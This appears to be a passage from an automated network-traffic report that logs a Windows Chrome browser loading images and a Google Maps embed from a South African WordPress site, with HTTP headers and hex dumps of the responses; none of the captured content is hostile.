                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 75 6c 74 26 26 21 31 21 3d 3d 63 2e 5f 64 65 66 61 75 6c 74 2e 61 70 70 6c 79 28 70 2e 70 6f 70 28 29 2c 74 29 7c 7c 21 56 28 6e 29 7c 7c 75 26 26 6d 28 6e 5b 64 5d 29 26 26 21 78 28 6e 29 26 26 28 28 61 3d 6e 5b 75 5d 29 26 26 28 6e 5b 75 5d 3d 6e 75 6c 6c 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 64 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 6e 5b 64 5d 28 29 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 76 6f 69 64 20 30 2c 61 26 26 28 6e 5b 75 5d 3d 61
                                                                                                                      Data Ascii: ult&&!1!==c._default.apply(p.pop(),t)||!V(n)||u&&m(n[d])&&!x(n)&&((a=n[u])&&(n[u]=null),S.event.triggered=d,e.isPropagationStopped()&&f.addEventListener(d,wt),n[d](),e.isPropagationStopped()&&f.removeEventListener(d,wt),S.event.triggered=void 0,a&&(n[u]=a


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      117192.168.2.449880196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC619OUTGET /wp-content/uploads/2018/02/IMAGE-1.jpg HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC264INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:05 GMT
                                                                                                                      ETag: "5df2b-56723b531a840"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 384811
                                                                                                                      Content-Type: image/jpeg
                                                                                                                      2024-12-03 07:55:25 UTC7928INData Raw: ff d8 ff e1 3e 4e 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 10 01 00 00 03 00 00 00 01 0e 74 00 00 01 01 00 03 00 00 00 01 07 3a 00 00 01 02 00 03 00 00 00 03 00 00 00 ce 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 d4 01 1b 00 05 00 00 00 01 00 00 00 dc 01 28 00 03 00 00 00 01 00 03 00 00 01 31 00 02 00 00 00 1e 00 00 00 e4 01 32 00 02 00 00 00 14 00 00 01 02 9c 9b 00 02 00 00 00 25 00 00 01 16 9c 9e 00 01 00 00 03 7a 00 00 01 3b 9c 9f 00 02 00 00 00 25 00 00 04 b5 ea 1c 00 07 00 00 13 94 00 00 04 da 87 69 00 04 00 00 00 01 00 00 18 70 00 00 2d 68 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70
                                                                                                                      Data Ascii: >NExifMM*t:(12%z;%ip-h''Adobe Photoshop
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 36 2f 4a dc e7 f9 7e 3f de 98 64 2c 91 91 e6 a6 32 3c d4 da 30 6a ff 00 ff d9 ff ed 1a 64 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 0f 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 00 00 38 42 49 4d 04 25 00 00 00 00 00 10 cd cf fa 7d a8 c7 be 09 05 70 76 ae af 05 c3 4e 38 42 49 4d 04 3a 00 00 00 00 00 93 00 00 00 10 00 00 00 01 00 00 00 00 00 0b 70 72 69 6e 74 4f 75 74 70 75 74 00 00 00 05 00 00 00 00 43 6c 72 53 65 6e 75 6d 00 00 00 00 43 6c 72 53 00 00 00 00 52 47 42 43 00 00 00 00 49 6e 74 65 65 6e 75 6d 00 00 00 00 49 6e 74 65 00 00 00 00 43 6c 72 6d 00 00 00 00 4d 70 42 6c 62 6f 6f 6c 01 00 00 00 0f 70 72 69 6e 74 53 69 78 74 65 65 6e 42 69 74 62 6f 6f 6c 00 00 00 00 0b 70 72 69 6e 74 65 72 4e 61 6d 65 54 45 58 54 00 00
                                                                                                                      Data Ascii: 6/J~?d,2<0jdPhotoshop 3.08BIMZ%G8BIM%}pvN8BIM:printOutputClrSenumClrSRGBCInteenumInteClrmMpBlboolprintSixteenBitboolprinterNameTEXT
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 77 6f 72 6b 5c 41 70 72 69 6c 5c 50 6c 61 6e 73 68 65 74 73 5c 31 37 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 33 35 3a 33 32 2b 30 36 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 48 3a 5c 50 68 6f 74 6f 73 68 6f 70 77 6f 72 6b 5c 41 70 72 69 6c 5c 50 6c 61 6e 73 68 65 74 73 5c 31 38 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 33 36 3a 34 37 2b 30 36 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 77 6f 72 6c 64 5f 6d 61 70 2e 70 73 64 20 63 6c 6f 73 65 64 26 23 78 41 3b 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 34 31 3a 30 33 2b 30 36 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 48 3a 5c 50 68 6f 74 6f 73 68 6f 70 77 6f 72 6b 5c 41 70 72 69 6c 5c 50 6c 61 6e 73 68 65 74 73 5c 31 39 2e 70
                                                                                                                      Data Ascii: work\April\Planshets\17.psd saved&#xA;2012-04-26T23:35:32+06:00&#x9;File H:\Photoshopwork\April\Planshets\18.psd saved&#xA;2012-04-26T23:36:47+06:00&#x9;File world_map.psd closed&#xA;2012-04-26T23:41:03+06:00&#x9;File H:\Photoshopwork\April\Planshets\19.p
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 45 38 45 39 43 39 44 32 46 46 46 33 34 31 45 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 35 2e 31 20 57 69 6e 64 6f 77 73 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 33 32 3a 35 37 2b 30 36 3a 30 30 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 31 31 41 38 30 45 41 34 43 32 38 46 45 31 31 31 38 45 38 45 39 43 39 44 32 46 46 46 33 34 31 45 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43
                                                                                                                      Data Ascii: E8E9C9D2FFF341E" stEvt:softwareAgent="Adobe Photoshop CS5.1 Windows" stEvt:when="2012-04-26T23:32:57+06:00"/> <rdf:li stEvt:action="saved" stEvt:changed="/" stEvt:instanceID="xmp.iid:11A80EA4C28FE1118E8E9C9D2FFF341E" stEvt:softwareAgent="Adobe Photoshop C
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 73 63 69 65 6e 63 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 65 6c 65 63 74 72 6f 6e 69 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 74 65 63 68 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 62 75 74 74 6f 6e 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 67 72 61 70 68 69 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 6d 61 6c 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 69 63 6f 6e 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 69 6e 74 65 72 61 63 74 69 6f 6e 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 6e 65 74 77 6f 72 6b 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 74 6f 75 63 68 73 63 72 65
                                                                                                                      Data Ascii: f:li> <rdf:li> science</rdf:li> <rdf:li> electronic</rdf:li> <rdf:li> tech</rdf:li> <rdf:li> button</rdf:li> <rdf:li> graphic</rdf:li> <rdf:li> male</rdf:li> <rdf:li> icon</rdf:li> <rdf:li> interaction</rdf:li> <rdf:li> network</rdf:li> <rdf:li> touchscre
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: b8 bf fb 11 fe 36 23 de f4 2f 11 c7 af 74 f3 86 a3 2f 93 a5 5d 02 40 c6 a3 d0 d4 b2 56 2b 01 4b 50 4f f9 2c 4c 92 cd 6b 5f d2 7d 3f ab f1 ed f8 54 b4 aa 38 f1 f2 af 91 f2 ff 00 57 af 4c dc 9a 42 e6 b4 e1 e7 4f 31 e7 e5 fe a1 d0 c9 16 10 8c ab ab c1 1a 47 0d 5d 2b cf 5a 36 86 54 b5 34 4c 71 95 2b 26 91 59 e6 d3 ab 30 90 05 17 6f 14 31 01 c3 0f 67 22 0f d5 35 5e d0 45 4f 86 d8 f8 4f af f4 a9 f6 01 d0 7c dc 0f 06 a1 bb 8a 9a 0f 15 73 f1 0f 4a 7e 12 7e d2 7d 3a e7 43 44 b2 63 69 e3 5c 5d 13 3a 19 e1 9b 4e d2 ca b4 d4 91 e4 71 98 3a 68 b2 1a 92 b5 63 6a 88 e7 60 b1 69 b3 16 6d 5c 06 e3 69 18 31 80 22 15 cd 7f 4d b1 55 51 5e 3c 6b c3 f6 f0 3d 7a 49 0a cc cc 66 6a 60 8f d4 5a 1d 2c e4 af 0e 14 e3 5f b3 ac 35 f1 e5 63 79 1a 93 6a d1 56 be 62 4a 5a b6 a7 3b 7a be
                                                                                                                      Data Ascii: 6#/t/]@V+KPO,Lk_}?T8WLBO1G]+Z6T4Lq+&Y0o1g"5^EOO|sJ~~}:CDci\]:Nq:hcj`im\i1"MUQ^<k=zIfj`Z,_5cyjVbJZ;z
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 8a fa 2d 89 24 93 f1 79 92 84 ff 00 97 fd e7 8e 7a e7 4b 95 a1 92 84 c1 51 b8 69 e1 d1 5b 8e 9c 03 86 67 90 9a da 77 db d9 36 f1 19 8c 6e b4 98 77 69 ee 02 bb 38 01 89 f4 aa d0 ab 06 04 46 78 1f 3f cc 7e d3 8e ac 60 70 fa 96 dc fc 24 7c 5e 87 50 fd ad 8e b3 55 65 28 ea 67 a4 9a 4d c1 4c 5a a6 82 8d 2b 42 62 4f 8e 9a 58 fe e3 0b 24 01 64 77 68 fc 78 9c e5 5c a0 72 80 c2 9a 42 a6 84 5d 2a 10 08 f0 ce 09 a6 7f 3f f0 81 fb 7a f2 42 ea 1d 44 26 80 9a 77 71 fc 5f f1 e5 51 f9 9a d4 d4 f5 3f f8 e5 32 e6 a3 ad 5c fd 2b 94 ad 8a 35 97 f8 4c a2 0f b7 a2 98 e2 e9 aa 35 7d cf 9d 7c b8 cc a5 44 be 92 aa 0c 2a aa 16 30 a9 ef 5e 19 d0 47 86 78 7a fe 7e 9e a0 7e de b4 2d 9b c2 d0 61 39 1e be 67 24 70 f5 00 7e 75 e3 53 d7 a9 32 94 78 f5 aa 96 9b 70 d3 4b 36 3e 9a b0 63 a1
                                                                                                                      Data Ascii: -$yzKQi[gw6nwi8Fx?~`p$|^PUe(gMLZ+BbOX$dwhx\rB]*?zBD&wq_Q?2\+5L5}|D*0^Gxz~~-a9g$p~uS2xpK6>c
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: fb a9 60 3c fa f7 59 d6 20 05 bf 36 27 fd b7 f5 e3 db 65 da a6 87 ab 85 f5 eb 2a 45 cd ad fe 37 fc fd 2e 7f db 5b dd 49 24 d4 f5 bd 22 b5 a6 7a ce 91 1b 8e 3e 9f 53 fd 4f e7 de ba b7 59 d6 1b 9e 41 ff 00 7d f4 e3 eb ef dd 6b e5 d4 85 87 91 c1 bf d4 ff 00 bd fd 39 fa 7b d5 40 eb 74 ea 4a 42 48 07 fc 7f db ff 00 c8 bd d4 b7 56 0a 4e 47 52 63 87 fb 46 d7 fa 0f f6 fe ea 4f 57 54 f5 ea 50 80 0b 10 bc db fd f5 fd eb ab 00 07 97 59 d6 1f a7 d6 df ef 1f f1 5f 7a eb 7d 48 58 be a6 d7 b9 e3 fd eb df ba f7 52 16 2b 10 3f 03 eb ff 00 11 c7 ba 97 14 eb 7d 66 58 be bc 7d 4f d7 fe 27 dd 0b 9f 2e bd 4e b3 ac 57 3f e1 fe db db 65 80 c9 3d 58 02 7a 90 b0 92 2e 47 f4 02 d6 e3 fe 35 ee 86 41 5c 75 b0 be bd 49 5a 7e 17 8f cf e7 eb f4 fc ff 00 41 ee 85 c9 ea d4 1e 9d 66 58 7f
                                                                                                                      Data Ascii: `<Y 6'e*E7.[I$"z>SOYA}k9{@tJBHVNGRcFOWTPY_z}HXR+?}fX}O'.NW?e=Xz.G5A\uIZ~AfX
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 4e 63 22 16 24 03 ea 47 1a 79 9a 7a f0 ae 2b 5e bc b7 30 3c f2 da a4 a0 dc 22 82 c0 79 06 e1 5f 20 4f 1a 56 b4 cd 28 47 51 52 05 b7 23 9e 7e bc 7d 7f 3c 7f 87 ba ac 78 a9 ea e5 e9 f3 e8 43 c6 f5 4f 60 64 f0 8b b8 71 db 5e b2 a7 15 25 3c b5 51 4c b5 38 d8 ab 2a a9 a2 05 9a 7a 2c 34 d5 b1 e6 6b a3 91 54 98 8c 34 ef e6 02 f1 ea 1e cc e1 da 6f a4 83 ea 23 b6 26 2a 57 8a d4 81 e8 b5 d4 7e 54 06 be 55 e8 aa 6d f3 6c 86 e3 e9 64 bb 55 98 1a 1c 31 00 9f 22 c0 68 1f 3a b0 a7 9d 3a 68 da fb 3b 72 6f 3c 8c b8 9d b1 8a 93 2d 90 a6 a1 9f 27 51 02 54 51 51 ac 14 14 af 0c 75 15 73 d4 64 2a 68 e9 62 86 17 a8 40 4b 38 e5 87 1e da b5 b3 b8 bc 90 c3 6b 16 b9 02 96 22 a0 50 0e 24 92 40 a6 47 9f 4f 5e df da d8 44 27 bc 9b 44 45 82 83 42 6a c7 80 01 41 35 34 3e 5d 4e dc db 07
                                                                                                                      Data Ascii: Nc"$Gyz+^0<"y_ OV(GQR#~}<xCO`dq^%<QL8*z,4kT4o#&*W~TUmldU1"h::h;ro<-'QTQQusd*hb@K8k"P$@GO^D'DEBjA54>]N


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      118192.168.2.449878196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC616OUTGET /wp-content/uploads/2018/03/core.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC259INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:19 GMT
                                                                                                                      ETag: "a8c-56723b60747c0"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 2700
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:25 UTC2700INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 86 00 00 00 79 08 06 00 00 00 fc bd 59 5d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0a 2e 49 44 41 54 78 da ec 9d ed 6f 14 45 1c c7 7f 57 a1 b4 45 69 0b da d2 92 c0 89 45 53 54 38 10 54 82 d0 23 f8 80 09 05 9a 08 be 93 eb 5f 40 fb 17 14 de f9 ae 25 be 82 c4 f4 2a af 34 1a 0a e5 85 31 12 9e 42 88 8f 39 10 21 88 ca 41 02 0d 0f 95 ab 0a 14 88 c6 f9 75 b6 b6 85 b6 b7 3b 3b 33 bf 99 dd f9 26 6b 25 d0 bd bd d9 cf 7e 7f 0f 3b bb 53 02 4e 4e 13 a8 c4 0d 81 93 03 c3 c9 81 e1 14 4e d3 62 f3 4d fb 06 aa d8 7f 53 de 9f f0 67 55 91 df c8 b1 ad 30 bc 35 cf c9 c5 0d 8c 44 44 21 48 7b 27 7f 29 db 92 6c 4b 4b d8 6b de db 8e 79 d0 e4 18 30 79
                                                                                                                      Data Ascii: PNGIHDRyY]tEXtSoftwareAdobe ImageReadyqe<.IDATxoEWEiEST8T#_@%*41B9!Au;;3&k%~;SNNNbMSgU05DD!H{')lKKky0y


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      119192.168.2.449881216.58.208.2284434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC1008OUTGET /maps/embed?pb=!1m18!1m12!1m3!1d3310.269575042676!2d18.506898950722725!3d-33.93419402979206!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x1dcc5c8fde768b55%3A0x739aec15f4472a9f!2sHoward+Terraces!5e0!3m2!1sen!2sza!4v1540463967394 HTTP/1.1
                                                                                                                      Host: www.google.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC762INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4d1d4nWPj1v-bscxw7iDwg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/geo-maps-api/1
                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                      X-Robots-Tag: noindex,nofollow
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Vary: Origin
                                                                                                                      Vary: X-Origin
                                                                                                                      Vary: Referer
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: scaffolding on HTTPServer2
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Accept-Ranges: none
                                                                                                                      Vary: Accept-Language,Accept-Encoding
                                                                                                                      Connection: close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      2024-12-03 07:55:25 UTC628INData Raw: 39 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 6d 61 70 44 69 76 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 61 70 44 69 76 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 34 64 31 64 34 6e 57
                                                                                                                      Data Ascii: 9ff<!DOCTYPE html><html> <head> <style type="text/css"> html, body, #mapDiv { height: 100%; margin: 0; padding: 0; } </style> </head> <body> <div id="mapDiv"></div> <script nonce="4d1d4nW
                                                                                                                      2024-12-03 07:55:25 UTC1390INData Raw: 30 30 33 39 38 31 31 39 32 36 36 38 37 22 5d 2c 22 2f 67 2f 31 31 63 36 63 68 62 32 76 6c 22 2c 6e 75 6c 6c 2c 5b 33 39 35 35 36 32 36 33 38 30 2c 31 38 35 30 39 32 36 34 31 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 67 63 69 64 3a 63 6f 72 70 6f 72 61 74 65 5f 6f 66 66 69 63 65 22 5d 2c 30 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 30 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 5b 22 65 6e 5f 55 53 22 5d 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 2f 6d 61 70 73 2f 61 70 69 2f 6a 73 2f 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 69 63 65 2e 47 65 74 45 6e 74 69 74 79 44 65 74 61 69 6c 73 22 2c 22 2f 6d 61 70 73 2f 65 6d 62 65
                                                                                                                      Data Ascii: 0039811926687"],"/g/11c6chb2vl",null,[3955626380,185092641],null,null,null,null,null,null,null,null,null,null,"gcid:corporate_office"],0,0,null,null,0,null,0]]]],null,["en_US"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embe
                                                                                                                      2024-12-03 07:55:25 UTC548INData Raw: 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 6d 61 70 73 2d 61 70 69 2d 76 33 2f 65 6d 62 65 64 2f 6a 73 2f 35 39 2f 31 2f 69 6e 69 74 5f 65 6d 62 65 64 2e 6a 73 22 3b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 6d 62 65 64 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 6d 61 70 73 2d 61 70 69 2d 76 33 2f 65 6d 62 65 64 2f 6a 73 2f 35 39 2f 31 2f 69 6e 69 74 5f 65 6d 62 65 64 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 34 64 31 64 34 6e 57 50 6a 31 76 2d 62 73 63 78 77 37 69 44 77 67 22
                                                                                                                      Data Ascii: tps://maps.gstatic.com/maps-api-v3/embed/js/59/1/init_embed.js"; document.body.appendChild(embed); } </script> <link rel="preload" href="https://maps.gstatic.com/maps-api-v3/embed/js/59/1/init_embed.js" nonce="4d1d4nWPj1v-bscxw7iDwg"
                                                                                                                      2024-12-03 07:55:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      120192.168.2.44988213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:25 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 475
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                      x-ms-request-id: 07bbe555-e01e-0020-3c1f-45de90000000
                                                                                                                      x-ms-version: 2018-03-28
